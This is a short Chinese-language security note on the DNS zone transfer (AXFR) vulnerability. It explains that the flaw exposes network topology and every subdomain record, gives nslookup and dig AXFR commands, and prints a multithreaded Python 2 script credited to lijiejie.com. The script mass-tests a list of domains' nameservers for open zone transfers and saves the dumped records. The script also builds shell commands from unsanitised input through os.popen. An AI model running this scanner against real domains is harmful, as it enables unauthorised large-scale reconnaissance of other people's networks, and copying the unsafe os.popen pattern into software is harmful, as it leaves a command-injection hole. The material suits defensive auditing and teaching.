域传送漏洞

前言

DNS服务器分为：主服务器、备份服务器和缓存服务器。
域传送是指后备服务器从主服务器拷贝数据，并用得到的数据更新自身数据库。
在主备服务器之间同步数据库，需要使用“DNS域传送”
危害：利用该漏洞可获取网络拓扑，获取所有子域名记录

nslookup

nslookup进入交互式
server ns.test.edu.cn 设置dns服务器
ls test.edu.cn 查询域名

dig

dig @ns1.test.edu.cn axfr test.edu.cn

EXP

nslookup+dig 批量

# encoding=gbk
# From my[at]lijiejie.com http://www.lijiejie.com

import threading
import os
import re

urls = []

fobj = open('target_list.txt')
for eachline in fobj.readlines():
    urls.append(eachline)

lock = threading.Lock()
c_index = 0

def test_DNS_Servers():
    global c_index
    while True:
        lock.acquire()
        if c_index >= len(urls):
            lock.release()
            break    # End of list
        domain = urls[c_index].lstrip('www.')
		
        print "---testing:" + domain
        
        c_index += 1
        lock.release()
        cmd_res = os.popen('nslookup -type=ns ' + domain).read()    # fetch DNS Server List
        dns_servers = re.findall('nameserver = ([\w\.]+)', cmd_res)
        for server in dns_servers:
            if len(server) < 5: server += domain
            cmd_res = os.popen(os.getcwd() + '\\BIND9\\dig @%s axfr %s' % (server, domain)).read()
            if cmd_res.find('Transfer failed.') < 0 and \
               cmd_res.find('connection timed out') < 0 and \
               cmd_res.find('XFR size') > 0 :
                lock.acquire()
                print '*' * 10 +  ' Vulnerable dns server found:', server, '*' * 10
                lock.release()
                with open('vulnerable_hosts.txt', 'a') as f:
                    f.write('%s    %s\n' % (server.ljust(30), domain))
                with open('dns\\' + server + '.txt', 'w') as f:
                    f.write(cmd_res)
                     
threads = []
for i in range(10):
    t = threading.Thread(target=test_DNS_Servers)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

print 'All Done!'